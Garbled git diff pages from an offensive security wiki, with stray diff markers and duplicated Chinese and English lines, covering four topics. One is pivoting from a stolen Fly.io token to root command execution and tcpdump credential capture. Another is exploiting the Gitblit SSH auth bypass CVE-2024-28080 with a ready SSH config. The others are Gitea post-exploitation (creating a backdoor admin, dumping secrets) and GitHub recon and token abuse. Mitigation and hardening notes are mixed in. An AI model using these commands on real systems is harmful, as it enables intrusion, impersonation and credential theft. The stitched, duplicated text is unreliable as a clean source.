## Cloud pivot with over-privileged tokens (example: Fly.io Machines API)
Some platforms issue a bearer token valid for both the container registry and the control-plane API. If you exfiltrate a registry token, try it against the provider's API.
Example API calls against the Fly.io Machines API using a stolen token from ~/.docker/config.json:
Enumerate apps in the organization:
```bash
curl -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps?org_slug=smithery"
```
Run commands as root inside any machine of any app:
```bash
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"","command":["id"],"container":"","stdin":"","timeout":5}'
```
Result: org-wide remote code execution across all hosted apps, provided the token has sufficient privileges.
## Stealing secrets from the compromised hosted service
With exec/RCE on a hosted server you can steal client-supplied secrets (API keys, tokens) or mount prompt-injection attacks. Example: install tcpdump and capture HTTP traffic on port 8080 to extract inbound credentials.
```bash
# Install tcpdump inside the machine
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"apk add tcpdump","command":[],"container":"","stdin":"","timeout":5}'
# Capture traffic
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"tcpdump -i eth0 -w /tmp/log tcp port 8080","command":[],"container":"","stdin":"","timeout":5}'
```
Captured requests often contain client credentials in headers, bodies, or query params.
## References
- [Breaking MCP Server Hosting: Build-Context Path Traversal to Org-wide RCE and Secret Theft](https://blog.gitguardian.com/breaking-mcp-server-hosting/)
- [Fly.io Machines API](https://fly.io/docs/machines/api/)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,12 +1,12 @@
# Gitblit Security
{{#include ../../banners/hacktricks-training.md}}
## What is Gitblit
Gitblit is a self-hosted Git server written in Java. It can run as a standalone JAR or in servlet containers and ships an embedded SSH service (Apache MINA SSHD) for Git over SSH.
## Topics
- Gitblit Embedded SSH Auth Bypass (CVE-2024-28080)
@@ -14,8 +14,8 @@ Gitblit 是一个用 Java 编写的自托管 Git 服务器。它可以作为独
gitblit-embedded-ssh-auth-bypass-cve-2024-28080.md
{{#endref}}
## References
- [Gitblit project](https://gitblit.com/)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,76 +4,80 @@
## Summary
CVE-2024-28080 is an authentication bypass in Gitblit's embedded SSH service due to incorrect session state handling when integrating with Apache MINA SSHD. If a user account has at least one SSH public key registered, an attacker who knows the username and any of that user's public keys can authenticate without the private key and without the password.
- Affected: Gitblit < 1.10.0 (observed on 1.9.3)
- Fixed: 1.10.0
- Requirements to exploit:
- Git over SSH enabled on the instance
- Victim account has at least one SSH public key registered in Gitblit
- Attacker knows victim username and one of their public keys (often discoverable, e.g., https://github.com/<username>.keys)
## Root cause (state leaks between SSH methods)
RFC 4252 中,publickey authentication 分为两个阶段:服务器先检查提供的公钥是否对某个用户名可接受,只有在挑战/响应带有签名之后才真正认证该用户。在 MINA SSHD 中,PublickeyAuthenticator 会被调用两次:在 key acceptance尚无签名时以及在客户端返回签名之后。
In RFC 4252, publickey authentication proceeds in two phases: the server first checks whether a provided public key is acceptable for a username, and only after a challenge/response with a signature does it authenticate the user. In MINA SSHD, the PublickeyAuthenticator is invoked twice: on key acceptance (no signature yet) and later after the client returns a signature.
Gitblit PublickeyAuthenticator 在第一次(签名前)的调用中会修改会话上下文,通过将已认证的 UserModel 绑定到会话并返回 true(“key acceptable。当认证之后回退到密码时PasswordAuthenticator 信任该被修改的会话状态并短路,返回 true 而不验证密码。因此,在先前对同一用户发生过 publickey acceptance” 后,任何密码(包括空密码)都会被接受。
Gitblits PublickeyAuthenticator mutated the session context on the first, presignature call by binding the authenticated UserModel to the session and returning true ("key acceptable"). When authentication later fell back to password, the PasswordAuthenticator trusted that mutated session state and shortcircuited, returning true without validating the password. As a result, any password (including empty) was accepted after a prior publickey "acceptance" for the same user.
High-level flawed flow:
1) Client offers username + public key (no signature yet)
2) Server recognizes the key as belonging to the user and prematurely attaches user to the session, returns true ("acceptable")
3) Client cannot sign (no private key), so auth falls back to password
4) Password auth sees a user already present in session and unconditionally returns success
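The flawed flow above can be reproduced with a small standalone simulation (this is not Gitblit's code, just a sketch of the broken pattern):

```python
REGISTERED_KEYS = {"alice": {"ssh-ed25519 AAAA...victim"}}

def publickey_auth(session, username, pubkey, signature=None):
    """Publickey phase (RFC 4252). BUG: binds the user to the session
    during key *acceptance*, before any signature is verified."""
    if pubkey in REGISTERED_KEYS.get(username, set()):
        session["user"] = username          # premature state mutation
        return signature is not None        # no signature yet -> not authenticated
    return False

def password_auth(session, username, password):
    """BUG: trusts state leaked by the incomplete publickey attempt
    instead of actually validating the password."""
    return session.get("user") == username

session = {}
publickey_auth(session, "alice", "ssh-ed25519 AAAA...victim")  # key acceptance only
print(password_auth(session, "alice", ""))  # -> True: empty password accepted
```

The fix is to bind the user to the session only after the signature verifies, and to make password auth validate the password regardless of prior session state.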
## Step-by-step exploitation
- Collect a victim's username and one of their public keys:
- GitHub exposes public keys at https://github.com/<username>.keys
- Public servers often expose authorized_keys
- Configure OpenSSH to present only the public half so signature generation fails, forcing a fallback to password while still triggering the publickey acceptance path on the server.
Example SSH client config (no private key available):
```sshconfig
# ~/.ssh/config
Host gitblit-target
  HostName <host-or-ip>
  User <victim-username>
  PubkeyAuthentication yes
  PreferredAuthentications publickey,password
  IdentitiesOnly yes
  IdentityFile ~/.ssh/victim.pub   # public half only (no private key present)
```
Connect and press Enter at the password prompt (or type any string):
```bash
ssh gitblit-target
# or Git over SSH
GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git ls-remote ssh://<victim-username>@<host>/<repo.git>
```
Authentication succeeds because the earlier publickey phase mutated the session to an authenticated user, and password auth incorrectly trusts that state.
Note: If ControlMaster multiplexing is enabled in your SSH config, subsequent Git commands may reuse the authenticated connection, increasing impact.
## Impact
- Full impersonation of any Gitblit user with at least one registered SSH public key
- Read/write access to repositories per the victim's permissions (source exfiltration, unauthorized pushes, supply-chain risks)
- Potential administrative impact if targeting an admin user
- Pure network exploit; no brute force or private key required
## Detection ideas
- Review SSH logs for sequences where a publickey attempt is followed by a successful password authentication with an empty or very short password
- Look for flows: publickey method offering unsupported/mismatched key material followed by immediate password success for the same username
## Mitigations
- Upgrade to Gitblit v1.10.0+
- Until upgraded:
- Disable Git over SSH on Gitblit, or
- Restrict network access to the SSH service, and
- Monitor for suspicious patterns described above
- Rotate affected user credentials if compromise is suspected
## General: abusing SSH auth method state leakage (MINA/OpenSSH-based services)
@@ -88,8 +92,8 @@ Practical tips:
- Public key harvesting at scale: pull public keys from common sources such as https://github.com/<username>.keys, organizational directories, team pages, leaked authorized_keys
- Forcing signature failure (client-side): point IdentityFile to only the .pub, set IdentitiesOnly yes, keep PreferredAuthentications to include publickey then password
- MINA SSHD integration pitfalls:
  - PublickeyAuthenticator.authenticate(...) must not attach user/session state until the post-signature verification path confirms the signature
  - PasswordAuthenticator.authenticate(...) must not infer success from any state mutated during a prior, incomplete authentication method
Related protocol/design notes and literature:
- SSH userauth protocol: RFC 4252 (the publickey method is a two-stage process)

View File

@@ -1,130 +1,141 @@
# Gitea Security
{{#include ../../banners/hacktricks-training.md}}
## What is Gitea
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
![](<../../images/image (160).png>)
### Basic Information
{{#ref}}
basic-gitea-information.md
{{#endref}}
## Lab
To run a Gitea instance locally you can just run a docker container:
```bash
docker run -p 3000:3000 gitea/gitea
```
Connect to port 3000 to access the web page.
You could also run it with kubernetes:
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
## Unauthenticated Enumeration
- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
## Internal Exploitation
For this scenario we are going to suppose that you have obtained some access to a Gitea account.
### With User Credentials/Web Cookie
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which **permissions you have** over which **repos**, in **which teams** you are, **list other users**, and **how the repos are protected.**
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
> [!NOTE]
> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
### With User SSH Key
Gitea allows **users** to set **SSH keys** that will be used as an **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can make **changes in repositories where the user has some privileges**; however, you cannot use it to access the Gitea API to enumerate the environment. You can, however, **enumerate local settings** to get information about the repos and user you have access to:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
If the user has configured their username as their Gitea username, you can access the **public keys they have set** in their account at _https://github.com/\<gitea_username>.keys_; you could check this to confirm that the private key you found can be used.
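To compare keys, note that an OpenSSH public key line is `type blob [comment]`, so two lines refer to the same key exactly when the first two fields match (derive the public half of a found private key with `ssh-keygen -y -f <keyfile>`). A tiny sketch:

```python
def same_pubkey(a: str, b: str) -> bool:
    """Compare two OpenSSH public key lines, ignoring the optional comment."""
    return a.split()[:2] == b.split()[:2]

found = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDc2example root@box"
published = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDc2example user@laptop"
print(same_pubkey(found, published))  # -> True: same key, different comment
```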
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually, on a server with different deploy keys, the local file **`~/.ssh/config`** will tell you which key is related to what.
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
```shell
gpg --list-secret-keys --keyid-format=long
```
### With User Token
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
A user token can be used **instead of a password** to **authenticate** against the Gitea server [**via API**](https://try.gitea.io/api/swagger#/). It will have **complete access** over the user.
### With Oauth Application
For an introduction about [**Gitea Oauth Applications check the basic information**](#with-oauth-application).
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accept it, probably as part of a phishing campaign.
As explained in the basic information, the application will have **full access over the user account**.
### Branch Protection Bypass
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But let's take a look at what can be done:
- **Enable Push**: If anyone with write access can push to the branch, just push to it.
- **Whitelist Restricted Push**: The same way, if you are part of this list, push to the branch.
- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it.
- **Require approvals is bigger than 0**: Then... you need to compromise another user
- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
Note that **if you are an org/repo admin** you can bypass the protections.
### Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook**, which will **prevent** external users who know the URL of the webhook, but not the secret, from **exploiting that webhook**.\
But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
Webhooks can be set at **repo and at org level**.
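If you can list hooks (e.g. via the Gitea API endpoint `GET /api/v1/repos/{owner}/{repo}/hooks` or its org-level equivalent, with a sufficiently privileged token), a quick triage is to flag credential-looking query parameters in the hook URLs. The parameter names below are just common guesses:

```python
from urllib.parse import urlparse, parse_qs

# Hypothetical list of parameter names that often carry credentials
SUSPICIOUS = {"secret", "token", "key", "apikey", "api_key", "password"}

def find_url_secrets(url: str) -> dict:
    """Return query parameters whose names look like credentials."""
    qs = parse_qs(urlparse(url).query)
    return {k: v for k, v in qs.items() if k.lower() in SUSPICIOUS}

hooks = [
    "https://ci.example.com/hook?ref=main",
    "https://chat.example.com/notify?token=hunter2",  # secret leaked in the URL
]
for h in hooks:
    leaked = find_url_secrets(h)
    if leaked:
        print(h, "->", leaked)
```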
## Post Exploitation
### Inside the server
If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
In this file you can find **keys** and **passwords**.
In the gitea path (by default: /data/gitea) you can find also interesting information like:
- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
- The **sessions** inside the sessions folder: running `cat sessions/*/*/*` you can see the usernames of the logged-in users (gitea could also save the sessions inside the DB).
- The **jwt private key** inside the jwt folder
- More **sensitive information** could be found in this folder
If you are inside the server you can also **use the `gitea` binary** to access/modify information:
- `gitea dump` will dump gitea and generate a .zip file
- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
- `gitea admin user change-password --username admin --password newpassword` Change the password
- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,103 +1,106 @@
# Basic Gitea Information
{{#include ../../banners/hacktricks-training.md}}
## Basic Structure
The basic Gitea environment structure is to group repos by **organization(s)**, each of which may contain **several repositories** and **several teams**. However, note that, just like in GitHub, users can have repos outside of the organization.
Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
A user may also be **part of different teams** with different permissions over different repos.
And finally **repositories may have special protection mechanisms**.
## Permissions
### Organizations
**组织被创建** 时,会创建一个名为 **Owners** 的团队,并将用户放入其中。该团队将提供对 **组织****管理员访问**,这些 **权限** 和团队的 **名称** **无法修改**
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
**Org admins** (owners) can select the **visibility** of the organization:
- Public
- Limited (logged in users only)
- Private (members only)
**Org admins** can also indicate if the **repo admins** can **add and/or remove access** for teams. They can also indicate the max number of repos.
When creating a new team, several important settings are selected:
- The **repos of the org the team members will be able to access** are indicated: specific repos (repos where the team is added) or all of them.
- It's also indicated **if members can create new repos** (creator will get admin access to it)
- The **permissions** the **members** of the repo will **have**:
- **Administrator** access
- **Specific** access:
![](<../../images/image (118).png>)
### Teams & Users
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
- Administrator
- Write
- Read
## Gitea Authentication
### Web Access
Using **username + password** and potentially (and recommended) a 2FA.
### **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys**
**无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **因发送未签名的提交而被发现**
You **cannot impersonate the user with these keys**, but if you don't use them it might be possible that you **get discovered for sending commits without a signature**.
### **Personal Access Tokens**
You can generate personal access tokens to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications
Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
![](<../../images/image (194).png>)
### Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
## Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
The **branch protections of a repository** can be found in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
> [!NOTE]
> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
Different protections can be applied to a branch (like to master):
- **Disable Push**: No-one can push to this branch
- **Enable Push**: Anyone with access can push, but not force push.
- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
- **Enable Status checks:** Require status checks to pass before merging.
- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
- **Block merge on official review requests**: If there are official review requests it cannot be merged
- **Dismiss stale approvals**: When new commits are pushed, old approvals will be dismissed.
- **Require Signed Commits**: Commits must be signed.
- **Block merge if pull request is outdated**
- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
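From the attacker's side you can enumerate these protections through the Gitea API before planning a bypass. A sketch (host, repo and token are placeholders; the `branch_protections` endpoint follows the Gitea API, but verify it against your target's version):

```python
#!/usr/bin/env python3
# Sketch: enumerate branch protections of a Gitea repo via the API.
# Host/owner/repo/token are hypothetical placeholders.
import json
import urllib.request

def build_request(host, owner, repo, token):
    url = f"{host}/api/v1/repos/{owner}/{repo}/branch_protections"
    return urllib.request.Request(url, headers={"Authorization": f"token {token}"})

def list_protections(host, owner, repo, token):
    with urllib.request.urlopen(build_request(host, owner, repo, token), timeout=10) as r:
        return json.load(r)

if __name__ == "__main__":
    try:
        for bp in list_protections("http://localhost:3000", "org", "repo", "TOKEN"):
            print(bp.get("branch_name"), "push_whitelist:", bp.get("push_whitelist_usernames"))
    except Exception as e:
        print(f"[-] request failed: {e}")
```

Knowing which branches have no push whitelist, or which users are whitelisted, tells you exactly which account or branch to go after.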
> [!NOTE]
> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected to prevent you from pushing code to master**, for example to compromise the CI/CD pipeline.
{{#include ../../banners/hacktricks-training.md}}

{{#include ../../banners/hacktricks-training.md}}
## What is Github
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
### Basic Information
{{#ref}}
basic-github-information.md
{{#endref}}
## External Recon
Github repositories can be configured as public, private and internal.
- **Private** means that **only** people of the **organisation** will be able to access them
- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
- **Public** means that **the whole internet** is going to be able to access it.
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
### Github Dorks
Github allows you to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
Tools (each tool contains its list of dorks):
- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
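The search-scoping described above is easy to automate; a small sketch that builds code-search URLs for a target scope (the dork list here is a tiny illustrative sample, not a replacement for the lists linked above):

```python
#!/usr/bin/env python3
# Sketch: generate GitHub code-search URLs scoped to a target.
# The dork list is a minimal illustrative sample.
from urllib.parse import quote_plus

DORKS = ["password", "api_key", "aws_access_key_id", "BEGIN RSA PRIVATE KEY"]

def dork_urls(scope, dorks=DORKS):
    # scope examples: "org:target-org", "user:target-user", "repo:owner/name"
    return [
        f"https://github.com/search?q={quote_plus(f'{scope} {d}')}&type=code"
        for d in dorks
    ]

if __name__ == "__main__":
    for url in dork_urls("org:target-org"):
        print(url)
```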
### Github Leaks
Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
Tools (each tool contains its list of regexes):
Check this page: **[https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html)**
> [!WARNING]
> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
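A quick way to cover every branch is to scan the whole history in one pass; a minimal sketch (the regexes are an illustrative subset of what the dedicated tools above ship with):

```python
#!/usr/bin/env python3
# Sketch: grep the full git history (all branches) for secret-looking strings.
# Feed the output of `git log -p --all` to scan(); the patterns are a small
# illustrative subset.
import re

PATTERNS = {
    "github_pat": re.compile(r"gh[pousr]_[A-Za-z0-9]{20,}"),
    "aws_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

def scan(text):
    hits = []
    for name, rx in PATTERNS.items():
        hits += [(name, m.group(0)) for m in rx.finditer(text)]
    return hits

if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["git", "log", "-p", "--all"],
                             capture_output=True, text=True, check=True).stdout
        for name, value in scan(out):
            print(f"[{name}] {value}")
    except Exception as e:
        print(f"[-] git log failed: {e}")
```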
### External Forks
It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](#execution-from-a-external-fork).
### Github Leaks in deleted/internal forks
Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
{{#ref}}
accessible-deleted-data-in-github.md
{{#endref}}
## Organization Hardening
### Member Privileges
There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- _I couldn't find this info in the APIs response, share if you do_
- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- _I couldn't find this info in the APIs response, share if you do_
- **More things can be configured** in this page but the previous are the ones more security related.
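Several of these defaults are visible through the Organizations API (`GET /orgs/{org}`); a sketch that flags risky values from such a response (the response here is a hardcoded sample for illustration, and the field names follow the GitHub REST API):

```python
#!/usr/bin/env python3
# Sketch: flag risky org-wide defaults from a `GET /orgs/{org}` response.
# The sample response is hardcoded for illustration.
def audit_org(org):
    findings = []
    if org.get("default_repository_permission") not in ("none", "read"):
        findings.append("base permission is higher than read")
    if org.get("members_can_create_public_repositories"):
        findings.append("members can create public repositories")
    if not org.get("two_factor_requirement_enabled"):
        findings.append("2FA is not enforced")
    return findings

if __name__ == "__main__":
    sample = {
        "default_repository_permission": "write",
        "members_can_create_public_repositories": True,
        "two_factor_requirement_enabled": False,
    }
    for f in audit_org(sample):
        print(f"[!] {f}")
```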
### Actions Settings
Several security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.
> [!NOTE]
> Note that all these configurations can also be set on each repository independently
- **Github actions policies**: It allows you to indicate which repositories can run workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- _I couldn't find an API with this info, share if you do_
- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- _I couldn't find an API with this info, share if you do_
- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
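The workflow-permission defaults can also be audited from the API response; a sketch that parses a `GET /orgs/{org}/actions/permissions/workflow` style response (sample hardcoded here; fetching it for real requires an appropriately scoped token):

```python
#!/usr/bin/env python3
# Sketch: check org-wide default GITHUB_TOKEN permissions.
# Field names follow the GitHub Actions permissions API; the sample is hardcoded.
def audit_workflow_perms(resp):
    findings = []
    if resp.get("default_workflow_permissions") == "write":
        findings.append("GITHUB_TOKEN defaults to write access")
    if resp.get("can_approve_pull_request_reviews"):
        findings.append("workflows can approve pull requests")
    return findings

if __name__ == "__main__":
    sample = {"default_workflow_permissions": "write",
              "can_approve_pull_request_reviews": True}
    for f in audit_workflow_perms(sample):
        print(f"[!] {f}")
```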
### Integrations
_Let me know if you know the API endpoint to access this info!_
- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
## Recon & Attacks abusing credentials
For this scenario we are going to suppose that you have obtained some access to a github account.
### With User Credentials
If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how the repos are protected.**
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
> [!NOTE]
> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
Check the section below about [**branch protections bypasses**](#branch-protection-bypass) in case it's useful.
### With User SSH Key
Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can perform **changes in repositories where the user has some privileges**; however, you cannot use it to access the github API to enumerate the environment. You can still **enumerate local settings** to get information about the repos and users you have access to:
```bash
# Go to the repository folder
# Get repo config and current user name and email
git config --list
```
If the user has configured his git username as his github username, you can access the **public keys he has set** in his account at _https://github.com/\<github_username>.keys_; you can check this to confirm that the private key you found can be used.
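This check can be scripted: derive the public key from the stolen private key (`ssh-keygen -y -f <key>`) and compare it against the `.keys` listing. A sketch (username and key material are hypothetical placeholders):

```python
#!/usr/bin/env python3
# Sketch: check whether a public key derived from a stolen private key
# appears in a user's https://github.com/<username>.keys listing.
import urllib.request

def normalize(line):
    # keep only "<type> <base64-blob>", dropping the trailing comment
    parts = line.strip().split()
    return tuple(parts[:2]) if len(parts) >= 2 else None

def key_in_listing(pub_line, keys_text):
    target = normalize(pub_line)
    return target is not None and any(
        normalize(l) == target for l in keys_text.splitlines()
    )

if __name__ == "__main__":
    try:
        with urllib.request.urlopen("https://github.com/someuser.keys", timeout=5) as r:
            listing = r.read().decode()
        print(key_in_listing("ssh-ed25519 AAAAC3Nza... comment", listing))
    except Exception as e:
        print(f"[-] fetch failed: {e}")
```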
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys, the local file **`~/.ssh/config`** will give you info about which key is related to which repo.
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
```shell
gpg --list-secret-keys --keyid-format=long
```
### With User Token
For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
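The prefix of a leaked token already tells you what kind of access it may carry; a small classifier sketch (prefixes per GitHub's published token formats):

```python
#!/usr/bin/env python3
# Sketch: classify a leaked GitHub token by its prefix
# (prefixes per GitHub's announced token formats).
PREFIXES = {
    "ghp_": "personal access token (classic)",
    "gho_": "OAuth access token",
    "ghu_": "GitHub App user-to-server token",
    "ghs_": "GitHub App server-to-server token",
    "ghr_": "refresh token",
    "github_pat_": "fine-grained personal access token",
}

def classify(token):
    for prefix, kind in PREFIXES.items():
        if token.startswith(prefix):
            return kind
    return "unknown format"

if __name__ == "__main__":
    print(classify("ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123"))
```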
### With Oauth Application
For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A user should always check the scopes requested before accepting them.
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
### With Github Application
For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
#### Impersonate a GitHub App with its private key (JWT → installation access tokens)
If you obtain the private key (PEM) of a GitHub App, you can fully impersonate the app across all of its installations:
- Generate a short-lived JWT signed with the private key
- Call the GitHub App REST API to enumerate installations
- Mint per-installation access tokens and use them to list/clone/push to repositories granted to that installation
Requirements:
- GitHub App private key (PEM)
